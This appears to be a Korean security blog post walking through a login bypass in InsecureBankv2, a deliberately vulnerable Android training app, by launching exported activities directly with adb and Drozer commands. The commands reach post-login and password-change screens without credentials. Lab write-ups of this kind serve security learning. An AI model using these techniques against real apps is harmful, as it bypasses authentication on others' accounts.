[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer)

Notice

Recent Posts

Recent Comments

Link

« 2024/04 »
일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

Tags more

Archives

Today

Total

관리 메뉴

Self-Improvement

[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer) 본문

AOS/InsecureBankv2

[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer)

JoGeun 2021. 12. 29. 11:03

Login Bypass

AndroidManifest.xml 파일에는 액티비티가 선언되어 있으며 이때 exported 설정값이 true이거나 <intent-filter> 태그 안에 exporter 설정이 안되어 있으면 기본값으로 true로 설정되는데 이때 해당 액티비티를 권한 없이 요청하여 접근할 수 있다.

ADB

ADB 명령어를 이용하여 해당 액티비티를 요청하면 된다.

adb shell am start -n com.android.insecurebankv2/.PostLogin //

Drozer

Drozer로의 방법은 아래의 명령어를 수행하면 된다.

adb forward tcp:31415 tcp:31415
drozer console connect

// 취약점 출력
run app.package.attacksurface com.android.insecurebankv2

// activity 정보 출력
run app.activity.info -a com.android.insecurebankv2

// activity 요청
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.ChangePassword

'AOS > InsecureBankv2' 카테고리의 다른 글

[InsecureBankv2] Application Backup Enabled (abe.jar) (0)	2021.12.29
[InsecureBankv2] Insecure Storage of Credentials (0)	2021.12.29
[InsecureBankv2] Developer Login (0)	2021.12.29
[InsecureBankv2] Hidden Create User Button for Admins (0)	2021.12.29
InsecureBankv2 환경 구축 (0)	2021.12.28

'AOS/InsecureBankv2' Related Articles

Self-Improvement

[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer) 본문

[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer)

Login Bypass

ADB

Drozer

'AOS > InsecureBankv2' 카테고리의 다른 글

티스토리툴바